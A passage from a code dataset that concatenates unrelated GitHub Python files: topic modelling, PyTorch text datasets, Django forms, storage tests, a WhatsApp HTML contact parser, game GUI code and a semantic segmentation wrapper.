update_data_root(self.cfg)\n self.cfg = compat_cfg(self.cfg)\n\n if 'pretrained' in self.cfg.model:\n self.cfg.model.pretrained = None\n elif 'init_cfg' in self.cfg.model.backbone:\n self.cfg.model.backbone.init_cfg = None\n\n if self.cfg.model.get('neck'):\n if isinstance(self.cfg.model.neck, list):\n for neck_cfg in self.cfg.model.neck:\n if neck_cfg.get('rfp_backbone'):\n if neck_cfg.rfp_backbone.get('pretrained'):\n neck_cfg.rfp_backbone.pretrained = None\n elif self.cfg.model.neck.get('rfp_backbone'):\n if self.cfg.model.neck.rfp_backbone.get('pretrained'):\n self.cfg.model.neck.rfp_backbone.pretrained = None\n\n self.cfg.device = get_device()\n self.cfg.data.test_dataloader.samples_per_gpu = int(self.base_file[\"workers\"])\n self.cfg.data.test_dataloader.workers_per_gpu = int(self.base_file[\"workers\"])\n\n if isinstance(self.cfg.data.test, dict):\n self.cfg.data.test.test_mode = True\n if self.cfg.data.test_dataloader.get('samples_per_gpu', 1) > 1:\n # Replace 'ImageToTensor' to 'DefaultFormatBundle'\n self.cfg.data.test.pipeline = replace_ImageToTensor(self.cfg.data.test.pipeline)\n elif isinstance(self.cfg.data.test, list):\n for ds_cfg in self.cfg.data.test:\n ds_cfg.test_mode = True\n if self.cfg.data.test_dataloader.get('samples_per_gpu', 1) > 1:\n 
for ds_cfg in self.cfg.data.test:\n ds_cfg.pipeline = replace_ImageToTensor(ds_cfg.pipeline)\n\n return self.cfg\n","repo_name":"AFKaro/SARDeep","sub_path":"src/infra/configs/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":6817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"21336076148","text":"import numpy as np\nimport codecs\nimport jieba\nimport re\nimport random\nimport math\nfrom scipy.special import psi\n\n# itemIdList : the list of distinct terms in the document\n# itemCountList : the list of number of the existence of corresponding terms\n# wordCount : the number of total words (not terms)\nclass Document:\n def __init__(self, itemIdList, itemCountList, wordCount):\n self.itemIdList = itemIdList\n self.itemCountList = itemCountList\n self.wordCount = wordCount\n\n# preprocessing (segmentation, stopwords filtering, represent documents as objects of class Document)\ndef preprocessing():\n \n # read the list of stopwords\n file = codecs.open('stopwords.dic','r','utf-8')\n stopwords = [line.strip() for line in file]\n file.close()\n \n # read the corpus for training\n file = codecs.open('dataset.txt','r','utf-8')\n documents = [document.strip() for document in file] \n file.close()\n \n docs = []\n word2id = {}\n id2word = {}\n \n currentWordId = 0\n for document in documents:\n word2Count = {}\n # segmentation\n segList = jieba.cut(document)\n for word in segList: \n word = word.lower().strip()\n # filter the stopwords\n if len(word) > 1 and not re.search('[0-9]', word) and word not in stopwords:\n if word not in word2id:\n word2id[word] = currentWordId\n id2word[currentWordId] = word\n currentWordId += 1\n if word in word2Count:\n word2Count[word] += 1\n else:\n word2Count[word] = 1\n itemIdList = []\n itemCountList = []\n wordCount = 0\n\n for word in word2Count.keys():\n itemIdList.append(word2id[word])\n itemCountList.append(word2Count[word])\n wordCount += word2Count[word]\n\n docs.append(Document(itemIdList, itemCountList, wordCount))\n\n return docs, word2id, id2word\n \ndef maxItemNum():\n num = 0\n for d in range(0, N):\n if len(docs[d].itemIdList) > num:\n num = len(docs[d].itemIdList)\n return num\n\ndef initialLdaModel():\n for z in range(0, K):\n for w in range(0, M):\n nzw[z, w] += 1.0/M + random.random()\n nz[z] += nzw[z, w]\n updateVarphi() \n\n# update model parameters : varphi (the update of alpha is ommited)\ndef updateVarphi():\n for z in range(0, K):\n for w in range(0, M):\n if(nzw[z, w] > 0):\n varphi[z, w] = math.log(nzw[z, w]) - math.log(nz[z])\n else:\n varphi[z, w] = -100\n\n# update variational parameters : gamma and phi\ndef variationalInference(docs, d, gamma, phi):\n phisum = 0\n oldphi = np.zeros([K])\n digamma_gamma = np.zeros([K])\n \n for z in range(0, K):\n gamma[d][z] = alpha + docs[d].wordCount * 1.0 / K\n digamma_gamma[z] = psi(gamma[d][z])\n for w in range(0, len(docs[d].itemIdList)):\n phi[w, z] = 1.0 / K\n\n for iteration in range(0, iterInference):\n for w in range(0, len(docs[d].itemIdList)):\n phisum = 0\n for z in range(0, K):\n oldphi[z] = phi[w, z]\n phi[w, z] = digamma_gamma[z] + varphi[z, docs[d].itemIdList[w]]\n if z > 0:\n phisum = math.log(math.exp(phisum) + math.exp(phi[w, z]))\n else:\n phisum = phi[w, z]\n for z in range(0, K):\n phi[w, z] = math.exp(phi[w, z] - phisum)\n gamma[d][z] = gamma[d][z] + docs[d].itemCountList[w] * (phi[w, z] - oldphi[z])\n digamma_gamma[z] = psi(gamma[d][z])\n\n\n# calculate the gamma parameter of new document\ndef 
inferTopicOfNewDocument():\n testDocs = []\n # read the corpus to be inferred\n file = codecs.open('infer.txt','r','utf-8')\n testDocuments = [document.strip() for document in file] \n file.close()\n \n for d in range(0, len(testDocuments)):\n document = testDocuments[d]\n word2Count = {}\n # segmentation\n segList = jieba.cut(document)\n for word in segList: \n word = word.lower().strip()\n if word in word2id:\n if word in word2Count:\n word2Count[word] += 1\n else:\n word2Count[word] = 1\n \n itemIdList = []\n itemCountList = []\n wordCount = 0\n\n for word in word2Count.keys():\n itemIdList.append(word2id[word])\n itemCountList.append(word2Count[word])\n wordCount += word2Count[word]\n\n testDocs.append(Document(itemIdList, itemCountList, wordCount))\n \n gamma = np.zeros([len(testDocuments), K])\n for d in range(0, len(testDocs)):\n phi = np.zeros([len(testDocs[d].itemIdList), K])\n variationalInference(testDocs, d, gamma, phi)\n \n return gamma\n \ndocs, word2id, id2word = preprocessing() \n\n \n# number of documents for training\nN = len(docs)\n# number of distinct terms\nM = len(word2id)\n# number of topic\nK = 10\n# iteration times of variational inference, judgment of the convergence by calculating likelihood is ommited\niterInference = 20 \n# iteration times of variational EM algorithm, judgment of the convergence by calculating likelihood is ommited\niterEM = 20\n\n# initial value of hyperparameter alpha\nalpha = 5\n# sufficient statistic of alpha\nalphaSS = 0\n# the topic-word distribution (beta in D. Blei's paper)\nvarphi = np.zeros([K, M])\n# topic-word count, this is a sufficient statistic to calculate varphi\nnzw = np.zeros([K, M])\n# topic count, sum of nzw with w ranging from [0, M-1], for calculating varphi\nnz = np.zeros([K])\n\n# inference parameter gamma\ngamma = np.zeros([N, K])\n# inference parameter phi\nphi = np.zeros([maxItemNum(), K])\n\n# initialization of the model parameter varphi, the update of alpha is ommited\ninitialLdaModel()\n\n# variational EM Algorithm\nfor iteration in range(0, iterEM): \n nz = np.zeros([K])\n nzw = np.zeros([K, M])\n alphaSS = 0\n # E-Step\n for d in range(0, N):\n variationalInference(docs, d, gamma, phi)\n gammaSum = 0\n for z in range(0, K):\n gammaSum += gamma[d, z]\n alphaSS += psi(gamma[d, z])\n alphaSS -= K * psi(gammaSum)\n\n for w in range(0, len(docs[d].itemIdList)):\n for z in range(0, K):\n nzw[z][docs[d].itemIdList[w]] += docs[d].itemCountList[w] * phi[w, z]\n nz[z] += docs[d].itemCountList[w] * phi[w, z]\n\n # M-Step\n updateVarphi()\n\n# calculate the top 10 terms of each topic\ntopicwords = []\nmaxTopicWordsNum = 10\nfor z in range(0, K):\n\tids = varphi[z, :].argsort()\n\ttopicword = []\n\tfor j in ids:\n\t\ttopicword.insert(0, id2word[j])\n\ttopicwords.append(topicword[0 : min(10, len(topicword))])\n\n# infer the topic of each new document\ninferGamma = inferTopicOfNewDocument()\ninferZ = []\nfor i in range(0, len(inferGamma)):\n inferZ.append(inferGamma[i, :].argmax())\n","repo_name":"laserwave/lda_variational_em","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7056,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"84"} +{"seq_id":"20701663941","text":"from torch.utils.data import Dataset\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport pandas as pd\nimport numpy as np\nimport torch\n\n\nclass AmazonText(Dataset):\n def __init__(self, w2v, path='balanced_stemmed_amazon_50k.csv'):\n super(AmazonText, self).__init__()\n 
self.w2v = w2v\n self.df = pd.read_csv(path, sep='\\t')\n self.df = self.df[~self.df['reviewText'].isnull()]\n self.text = self.df['reviewText'].values\n self.text = self.text[2000:]\n self.labels = self.df['overall'].apply(\n lambda x: 0. if x <= 2.5 else 1.).values\n self.tfidf = TfidfVectorizer(\n min_df=0, lowercase=False, token_pattern=r\"([^\\s]+|[:=;][o0\\-]?[D\\)\\]\\(\\]/\\\\OpP])\").fit(self.text)\n\n def __len__(self):\n return self.text.shape[0]\n\n def __getitem__(self, idx):\n # TODO:Here, when unknown word is met, we replace it by zeros(which might represent a word with a meaning,\n # it is necessary to replace unknown wrds by a specific token so that representation isn't biased., to be added in preprocessing phase)\n t = self.text[idx]\n label = self.labels[idx]\n output = text2vec(t, self.w2v, tfidf=self.tfidf)\n dic = {'w2v': output, 'label': torch.Tensor([label]), 'text': t}\n return dic\n\n\nclass AmazonTextRecurrent(Dataset):\n def __init__(self, w2v, max_len=None, path='stemmed_amazon_500k_train.csv', preprocessor=None, stemmer=None):\n super(AmazonTextRecurrent, self).__init__()\n self.preprocessor = preprocessor\n self.stemmer = stemmer\n self.w2v = w2v\n self.df = pd.read_csv(path, sep='\\t')\n self.df = self.df[~self.df['reviewText'].isnull()]\n self.df = self.df.reset_index()\n self.text = self.df['reviewText'].values\n self.labels = self.df['overall'].apply(lambda x: 0. if x <= 2.5 else 1.).values\n if max_len is None:\n self.max_len = max([len(t.split(' ')) for t in self.text])\n else:\n self.max_len = max_len\n\n def __len__(self):\n return self.text.shape[0]\n\n def __getitem__(self, idx):\n t = self.text[idx]\n label = self.labels[idx]\n\n if self.preprocessor is not None:\n t = self.preprocessor(t, stemmer=self.stemmer)\n\n output = text2matrix(t, self.w2v, max_len=self.max_len)\n dic = {'w2v': output, 'label': torch.Tensor([float(label)]*30), 'text': t}\n return dic\n\n\ndef text2matrix(text, w2v, max_len=None):\n text = text.split(' ')\n if max_len is None:\n max_len = len(text)\n matrix = torch.zeros((max_len, w2v.vector_size))\n i = 0\n j = 0\n while j < len(text) and i < max_len:\n try:\n matrix[i, :] = torch.Tensor(w2v[text[j]])\n i += 1\n except KeyError:\n pass\n j += 1\n return matrix\n\n\ndef text2vec(text, w2v, tfidf=None):\n output = torch.zeros(w2v.vector_size)\n text = text\n if tfidf is not None:\n tfidf_t = tfidf.transform([text])\n tfidfs = []\n for i, word in enumerate(text.split(' ')):\n try:\n if len(word) > 1:\n tfidfs += [tfidf_t[0, tfidf.vocabulary_[word]]]\n else:\n tfidfs += [0.]\n except KeyError:\n pass\n\n for i, word in enumerate(text.split(' ')):\n try:\n if len(word) > 1 and tfidf is not None:\n output += torch.Tensor(w2v.wv[word]) * torch.Tensor([tfidfs[i]])\n elif tfidf is None:\n output += torch.Tensor(w2v.wv[word])\n except KeyError:\n pass\n if torch.sum(output) != 0:\n output = output / torch.norm(output)\n return output\n\n\ndef split_ids(dataset, test_size=.2, shuffle=True, seed=0):\n length = len(dataset)\n indices = list(range(length))\n\n if shuffle is True:\n import random\n random.seed(seed)\n random.shuffle(indices)\n\n if type(test_size) is float:\n split = int(test_size * length)\n elif type(test_size) is int:\n split = test_size\n else:\n raise ValueError('%s should be an int or a float' % str)\n return indices[split:], indices[:split]\n\n\ndef build_name(string, w2v_size, n_hidden, stemmer):\n import time\n if stemmer is None:\n model_name = 'models/{}_{}_{}_no_stem_{}.model'.format(string, n_hidden, 
w2v_size, time.strftime('%d%b_%X'))\n else:\n model_name = 'models/{}_{}_{}_stem_{}.model'.format(string, n_hidden, w2v_size, time.strftime('%d%b_%X'))\n return model_name\n","repo_name":"lgestin/TransferLearning","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4574,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"36637030175","text":"import os\r\nimport re\r\nimport csv\r\nimport nltk\r\nimport pandas as pd\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.probability import FreqDist\r\n\r\n\r\ndata_path = os.path.join(os.path.dirname(__file__),\"Cleaned_Data.csv\")\r\nsave_path = os.path.join(os.path.dirname(__file__),\"Word_Cloud.csv\")\r\nsave_path1 = os.path.join(os.path.dirname(__file__),\"Unique_Cloud.csv\")\r\ndata = pd.read_csv(data_path)\r\n\r\nword = \"\"\r\nword_ls = []\r\nfor n,i in enumerate(data[\"Content of Post\"]):\r\n word+=i\r\n word_ls+=word_tokenize(i)\r\n if(n%1000==0):\r\n print(\"Creating Bag of Words...@\",n)\r\n\r\nprint(\"----------------------------------Completed---------------------------------\")\r\nuniq_ls = list(set(word_ls))\r\nprint(len(word_ls))\r\nunique_list = list(dict.fromkeys(word_ls))\r\nprint(len(unique_list))\r\nprint(len(uniq_ls))\r\n \r\nfre = FreqDist()\r\nufre = FreqDist()\r\nfor i in word_ls:\r\n fre[i.capitalize()]+=1\r\n\r\nfor i in uniq_ls:\r\n ufre[i.capitalize()]+=1\r\n\r\nprint(\"Frequency Generated\")\r\n\r\n# pss=[]\r\n# for key in fre.keys():\r\n# poss = nltk.pos_tag([key])\r\n# print(poss[0][1])\r\n# if(poss[0][1] not in pss):\r\n# pss.append(poss[0][1])\r\n\r\npss = ['NNP', 'PRP', 'DT', 'NN', 'VB', 'IN', 'CD', 'WRB', 'SYM', '$', 'RB']\r\nwith open(save_path, 'w') as f:\r\n for key in fre.keys():\r\n try:\r\n if(key[0].isdecimal() or key[1].isdecimal()):\r\n continue\r\n except IndexError:\r\n pass\r\n # pos_tag expects a list of tokens; a bare string would be tagged character by character.\r\n poss = nltk.pos_tag([key])\r\n if(poss[0][1] in [\"NNP\",\"NN\",\"VB\",\"NNS\",\"NNPS\",\"VBN\"]):\r\n f.write(\"%s,%s\\n\"%(key,fre[key]))\r\n\r\nprint(\"Word Written\")\r\n\r\nwith open(save_path1, 'w') as f:\r\n for key in ufre.keys():\r\n try:\r\n if(key[0].isdecimal() or key[1].isdecimal()):\r\n continue\r\n except IndexError:\r\n pass\r\n poss = nltk.pos_tag([key])\r\n if(poss[0][1] in [\"NNP\",\"NN\",\"VB\",\"NNS\",\"NNPS\",\"VBN\"]):\r\n f.write(\"%s,%s\\n\"%(key,ufre[key]))\r\n\r\nprint(\"Written on CSV\")","repo_name":"iSriBalaji/Twitter-and-Facebook-post-clustering","sub_path":"Getting Bag of Words.py","file_name":"Getting Bag of Words.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"71744899474","text":"class Solution:\n    def minMoves2(self, nums: List[int]) -> int:\n        # each move: +1 or -1 on a single element\n        # minimizing the total number of moves means moving every element to the\n        # median, not the mean:\n        # ex: [1, 10, 2, 9] sorted is 1, 2, 9, 10; any target between 2 and 9\n        #     (including the upper median 9) gives 8+7+0+1 = 16 moves\n        # ex: [1, 0, 0, 8, 6] sorted is 0, 0, 1, 6, 8; median = 1, moves = 1+1+0+5+7 = 14\n        # ex: [1, 2, 3]: median = 2, moves = 1 + 0 + 1 = 2\n        \n        # sort the array and take the (upper) median\n        nums = sorted(nums)\n        medianEl = nums[len(nums)//2]\n        \n        # sum the absolute differences to the median\n        totalMoves = 0\n        for i in range(len(nums)):\n            indMove = (nums[i] - medianEl)\n            if indMove < 0:\n                indMove*=-1\n            totalMoves += indMove\n        return totalMoves\n","repo_name":"iamaryaak/LeetCode-Python","sub_path":"462.py","file_name":"462.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"1937090040","text":"__author__ = 'austin_45B_Kerkhoff'\nfrom django.forms.util import ErrorList\nfrom django.forms import ModelForm, DateTimeInput, CharField, TextInput, model_to_dict\nfrom SampleISP.models import VENDOR, PROVINCE, Router, Switch, IPaddress, \\\n RAS, Customer, RouterPort, SwitchPort\nfrom django.forms.models import BaseModelFormSet, modelformset_factory, inlineformset_factory\nfrom django.conf import settings\nfrom SampleISP.widgets import MyTextInputWidget\n\nclass RouterForm(ModelForm):\n router_name = CharField(\n widget=TextInput(attrs={'class': 'sortable', 'readonly':'readonly'}),\n initial='Initial Value',\n )\n class Meta:\n model = Router\n fields = ('router_name','router_model','last_maintained_date',)\n # exclude = ('id',)\n widgets = {\n 'last_maintained_date': DateTimeInput(attrs={'class':'sortable',}),\n # 'router_name': TextInput(attrs={'class': 'sortable', 'value':'Router_Name', 'readonly':'readonly'}),\n }\n\nclass FormSetWithExtra(BaseModelFormSet):\n def add_fields(self, form, index):\n super(FormSetWithExtra,self).add_fields(form, index)\n form.fields['extra_field'] = CharField(required=False)\n\nRouterPortFormSet = modelformset_factory(RouterPort,\n extra=1,\n can_order=False, can_delete=False)\n\nRouterPortFormSetWithExtra = modelformset_factory(RouterPort,\n formset=FormSetWithExtra,\n extra=1,\n can_order=False, can_delete=False)\n\nclass SwitchForm(ModelForm):\n class Meta:\n model = Switch\n\nclass RouterPortForm(ModelForm):\n class Meta:\n model = RouterPort\n # widgets = {\n # 'port_name': MyTextInputWidget(\n # attrs={'class': 'sortable', 'readonly':'readonly'}\n # ),\n # }\n class Media:\n css = {\n 'all': (\n settings.STATIC_URL + 'css/themes/camtran/jquery-ui-1.8.6.custom.css',\n ),\n }\n js = (\n settings.STATIC_URL + 'js/jquery-1.9.0.js',\n settings.STATIC_URL + 'js/jquery-ui-1.10.0.custom.js',\n )\n\n def is_valid(self):\n if self:\n if self.initial['port_name'] != self.data['port_name']:\n port_name_changed = True\n else:\n port_name_changed = 
False\n if str(self.initial['router']) != self.data['router']:\n router_changed = True\n else:\n router_changed = False\n if str(self.initial['switch']) != self.data['switch']:\n switch_changed = True\n else:\n switch_changed = False\n is_valid = super(RouterPortForm, self).is_valid()\n return is_valid\n else:\n return False\n\nclass SwitchPortForm(ModelForm):\n class Meta:\n model = SwitchPort\n\nclass CustomerForm(ModelForm):\n class Meta:\n model = Customer\n\nclass RASForm(ModelForm):\n ras_name = CharField(\n widget=TextInput(attrs={'class': 'sortable', 'readonly':'readonly'}),\n initial='Initial Value',\n )\n class Meta:\n model = RAS\n fields = ('ras_name','ras_model','last_maintained_date',)\n\nclass IPaddressForm(ModelForm):\n class Meta:\n model = IPaddress\n\nIPaddressInlineFormSet = inlineformset_factory(RAS, IPaddress, extra=1)","repo_name":"austinjung/InterviewApp","sub_path":"SampleISP/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"13927713927","text":"import os\nimport unittest.mock\nfrom pathlib import Path\n\nimport pytest\n\nfrom determined.common import check, storage\nfrom determined.common.storage import shared\nfrom tests.storage import util\n\n\n@pytest.fixture()\ndef manager(tmp_path: Path) -> storage.SharedFSStorageManager:\n return storage.SharedFSStorageManager(str(tmp_path))\n\n\ndef test_full_storage_path() -> None:\n with pytest.raises(check.CheckFailedError, match=\"`host_path` must be an absolute path\"):\n shared._full_storage_path(\"host_path\")\n\n path = shared._full_storage_path(\"/host_path\")\n assert path == \"/host_path\"\n\n path = shared._full_storage_path(\"/host_path\", container_path=\"cpath\")\n assert path == \"cpath\"\n\n path = shared._full_storage_path(\"/host_path\", \"storage_path\")\n assert path == \"/host_path/storage_path\"\n\n path = shared._full_storage_path(\"/host_path\", \"storage_path\", container_path=\"cpath\")\n assert path == \"cpath/storage_path\"\n\n path = shared._full_storage_path(\"/host_path\", storage_path=\"/host_path/storage_path\")\n assert path == \"/host_path/storage_path\"\n\n path = shared._full_storage_path(\"/host_path\", \"/host_path/storage_path\", \"cpath\")\n assert path == \"cpath/storage_path\"\n\n with pytest.raises(check.CheckFailedError, match=\"must be a subdirectory\"):\n shared._full_storage_path(\"/host_path\", storage_path=\"/storage_path\")\n\n with pytest.raises(check.CheckFailedError, match=\"must be a subdirectory\"):\n shared._full_storage_path(\"/host_path\", storage_path=\"/host_path/../test\")\n\n with pytest.raises(check.CheckFailedError, match=\"must be a subdirectory\"):\n shared._full_storage_path(\"/host_path\", storage_path=\"../test\")\n\n\ndef test_checkpoint_lifecycle(manager: storage.SharedFSStorageManager) -> None:\n def post_delete_cb(storage_id: str) -> None:\n assert storage_id not in os.listdir(manager._base_path)\n\n util.run_storage_lifecycle_test(manager, post_delete_cb)\n\n\ndef test_validate(manager: storage.SharedFSStorageManager) -> None:\n assert len(os.listdir(manager._base_path)) == 0\n storage.validate_manager(manager)\n assert len(os.listdir(manager._base_path)) == 0\n\n\ndef test_validate_read_only_dir(manager: storage.SharedFSStorageManager) -> None:\n def permission_error(_1: str, _2: str) -> None:\n raise PermissionError(\"Permission denied\")\n\n with unittest.mock.patch(\"builtins.open\", permission_error):\n assert 
len(os.listdir(manager._base_path)) == 0\n with pytest.raises(PermissionError, match=\"Permission denied\"):\n storage.validate_manager(manager)\n assert len(os.listdir(manager._base_path)) == 1\n","repo_name":"2021-paper-fun/determined","sub_path":"harness/tests/storage/test_shared_fs.py","file_name":"test_shared_fs.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"84"} +{"seq_id":"722288727","text":"##############################\n# created by Bilal Haroon\n# \n# purpose: get all whatsapp contacts\n# \n# email: bharoon@acceducate.com\n##############################\n\n\n# html parser\nfrom bs4 import BeautifulSoup\n\ngroup_names = []\nnumbers = []\n\nf = open('test.html', 'r', encoding='utf8')\n\n# parse the file\nsource = BeautifulSoup(f.read(), \"html5lib\")\n\n# get the names\ndef get_names():\n \n names = source.find_all(\"div\", {\"class\": \"_3Bxar\"})\n\n # itirate through all the names\n for name in names:\n \n # get all the children\n children = name.findChildren()\n \n # iterate through all the children\n for child in children:\n # if child is a name\n if child.get('class') == ['_1qP8m']:\n \n group_names.append(child.text)\n # print(child.text)\n return group_names\n\n\n# get the numbers\ndef get_numbers():\n phone_numbers = source.find_all(\"div\", {\"class\":\"_25Ooe\"})\n\n for number in phone_numbers:\n \n # get all the chidren\n child = number.findChild()\n \n if child is not None:\n # if child is a phone number i.e +1 (123) 456-789\n if child.text[:2] == '+1':\n numbers.append(child.text)\n # print(child.text)\n return numbers\n\n\ndef main():\n for name in get_names():\n print(name)\n \n print(\"=====================================================\")\n \n for number in get_numbers():\n print(number)\n \n\nif __name__ == '__main__':\n main()","repo_name":"Bilalharoon/whatsapp_scrapper","sub_path":"get_info.py","file_name":"get_info.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"24114897339","text":"from . 
import ClothesGUI\nfrom toontown.toon import ToonDNA\n\nclass MakeClothesGUI(ClothesGUI.ClothesGUI):\n    notify = directNotify.newCategory('MakeClothesGUI')\n\n    def __init__(self, doneEvent):\n        ClothesGUI.ClothesGUI.__init__(self, ClothesGUI.CLOTHES_MAKETOON, doneEvent)\n\n    def setupScrollInterface(self):\n        self.dna = self.toon.getStyle()\n        gender = self.dna.getGender()\n        if gender != self.gender:\n            self.tops = ToonDNA.getRandomizedTops(gender, tailorId=ToonDNA.MAKE_A_TOON)\n            self.bottoms = ToonDNA.getRandomizedBottoms(gender, tailorId=ToonDNA.MAKE_A_TOON)\n            self.gender = gender\n        self.topChoice = 0\n        self.bottomChoice = 0\n        self.setupButtons()\n\n    def setupButtons(self):\n        ClothesGUI.ClothesGUI.setupButtons(self)\n        if len(self.dna.torso) == 1:\n            if self.gender == 'm':\n                torsoStyle = 's'\n            elif self.girlInShorts == 1:\n                torsoStyle = 's'\n            else:\n                torsoStyle = 'd'\n            self.toon.swapToonTorso(self.dna.torso[0] + torsoStyle)\n            self.toon.loop('neutral', 0)\n            self.toon.swapToonColor(self.dna)\n        self.swapTop(0)\n        self.swapBottom(0)\n        return None\n","repo_name":"open-toontown/open-toontown","sub_path":"toontown/makeatoon/MakeClothesGUI.py","file_name":"MakeClothesGUI.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"84"}
{"seq_id":"12113212172","text":"import os\nimport rospkg\nimport torch\nimport types\nimport numpy as np\nimport torch.nn as nn\nfrom PIL import Image\nfrom scipy.io import loadmat\nfrom torchvision import transforms\n\nfrom mit_semseg.config import cfg\nfrom mit_semseg.utils import colorEncode\nfrom mit_semseg.lib.utils import as_numpy\nfrom mit_semseg.lib.nn import async_copy_to\nfrom mit_semseg.models import ModelBuilder, SegmentationModule\n\n\nclass SemanticSegmentationNetwork():\n\tdef __init__(self, model=\"ade20k-resnet50dilated-ppm_deepsup.yaml\", args=None, verbose=False):\n\t\t'''\n\t\tInitializes and runs the CSAIL Semantic Segmentation network for use in the\n\t\tterrain estimation mapping algorithm. Loads network weights, prepares input\n\t\timages for network, runs the segmentation network, and outputs visualizations\n\t\tto a file.\n\n\t\tParameters\n\t\t------------\n\t\targs : obj, provides necessary arguments for network initialization\n\n\t\tReturns\n\t\t-----------\n\t\t'''\n\n\t\tself.verbose = verbose\n\t\trospack = rospkg.RosPack()\n\t\tpath = rospack.get_path('mit_semseg_wrapper')\n\t\tif args is None:\n\t\t\targs = types.SimpleNamespace()\n\t\t\targs.gpu = 0\n\t\t\targs.cfg = model\n\t\t\targs.opts = []\n\t\targs.cfg = os.path.join(path, os.path.join('src/mit_semseg/config/', args.cfg))\n\t\tself.args = args\n\n\t\tcfg.merge_from_file(args.cfg)\n\t\tcfg.merge_from_list(args.opts)\n\t\tcfg.MODEL.arch_encoder = cfg.MODEL.arch_encoder.lower()\n\t\tcfg.MODEL.arch_decoder = cfg.MODEL.arch_decoder.lower()\n\n\t\t# absolute paths of model weights\n\t\tcfg.MODEL.weights_encoder = os.path.join(\n\t\t\tpath, cfg.DIR, 'encoder_' + cfg.TEST.checkpoint)\n\t\tcfg.MODEL.weights_decoder = os.path.join(\n\t\t\tpath, cfg.DIR, 'decoder_' + cfg.TEST.checkpoint)\n\n\t\t# both encoder and decoder weights must be present on disk\n\t\tif not (os.path.exists(cfg.MODEL.weights_encoder) and\n\t\t\t\tos.path.exists(cfg.MODEL.weights_decoder)):\n\t\t\tprint(\"Could not find saved model weights!\")\n\t\t\treturn\n\n\t\tself.imgSizes = cfg.DATASET.imgSizes\n\t\tself.imgMaxSize = cfg.DATASET.imgMaxSize\n\t\tself.padding_constant = cfg.DATASET.padding_constant\n\t\tself.normalize = transforms.Normalize(\n\t\t\tmean=[0.485, 0.456, 0.406],\n\t\t\tstd=[0.229, 0.224, 0.225])\n\n\t\ttorch.cuda.set_device(args.gpu)\n\n\t\t# Network Builders\n\t\tif self.verbose:\n\t\t\tprint(\"Building encoder and decoder networks\")\n\t\tnet_encoder = ModelBuilder.build_encoder(\n\t\t\tarch=cfg.MODEL.arch_encoder,\n\t\t\tfc_dim=cfg.MODEL.fc_dim,\n\t\t\tweights=cfg.MODEL.weights_encoder)\n\t\tnet_decoder = ModelBuilder.build_decoder(\n\t\t\tarch=cfg.MODEL.arch_decoder,\n\t\t\tfc_dim=cfg.MODEL.fc_dim,\n\t\t\tnum_class=cfg.DATASET.num_class,\n\t\t\tweights=cfg.MODEL.weights_decoder,\n\t\t\tuse_softmax=True)\n\n\t\tcrit = nn.NLLLoss(ignore_index=-1)\n\n\t\tif self.verbose:\n\t\t\tprint(\"Building final semantic segmentation network\")\n\t\tself.segmentation_module = SegmentationModule(net_encoder, net_decoder, crit)\n\t\tself.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\t\tself.segmentation_module.to(self.device)\n\n\tdef prepareImage(self, image):\n\t\t'''\n\t\tResizes an image as necessary in order to be able to act as input into\n\t\tthe semantic segmentation network.\n\n\t\tParameters\n\t\t------------\n\t\timage : PIL.Image, image to use as input\n\n\t\tReturns\n\t\t-----------\n\t\timage : PIL.Image, resized and padded image\n\t\t'''\n\t\tif isinstance(image, Image.Image):\n\t\t\tori_width, ori_height = image.size\n\t\telif isinstance(image, np.ndarray):\n\t\t\timage = Image.fromarray(image.astype(np.uint8))\n\t\t\tori_width, ori_height = image.size\n\n\t\timg_resized_list = []\n\t\tfor this_short_size in self.imgSizes:\n\t\t\t# calculate target height and width\n\t\t\tscale = min(this_short_size / float(min(ori_height, ori_width)),\n\t\t\t\t\t\tself.imgMaxSize / float(max(ori_height, ori_width)))\n\t\t\ttarget_height, target_width = int(ori_height * scale), int(ori_width * scale)\n\n\t\t\t# to avoid rounding in network\n\t\t\ttarget_width = self.round2nearest_multiple(target_width, self.padding_constant)\n\t\t\ttarget_height = self.round2nearest_multiple(target_height, self.padding_constant)\n\n\t\t\t# resize images\n\t\t\timg_resized = 
self.imresize(image, (target_width, target_height), interp='bilinear')\n\n\t\t\t# image transform, to torch float tensor 3xHxW\n\t\t\timg_resized = self.img_transform(img_resized)\n\t\t\timg_resized = torch.unsqueeze(img_resized, 0)\n\t\t\timg_resized_list.append(img_resized)\n\n\t\toutput = dict()\n\t\toutput['img_ori'] = np.array(image)\n\t\toutput['img_data'] = [x.contiguous() for x in img_resized_list]\n\t\treturn output\n\n\tdef imresize(self, im, size, interp='bilinear'):\n\t\tif interp == 'nearest':\n\t\t\tresample = Image.NEAREST\n\t\telif interp == 'bilinear':\n\t\t\tresample = Image.BILINEAR\n\t\telif interp == 'bicubic':\n\t\t\tresample = Image.BICUBIC\n\t\telse:\n\t\t\traise Exception('resample method undefined!')\n\n\t\treturn im.resize(size, resample)\n\n\tdef img_transform(self, img):\n\t\t# 0-255 to 0-1\n\t\timg = np.float32(np.array(img)) / 255.\n\t\timg = img.transpose((2, 0, 1))\n\t\timg = self.normalize(torch.from_numpy(img.copy()))\n\t\treturn img\n\n\tdef round2nearest_multiple(self, x, 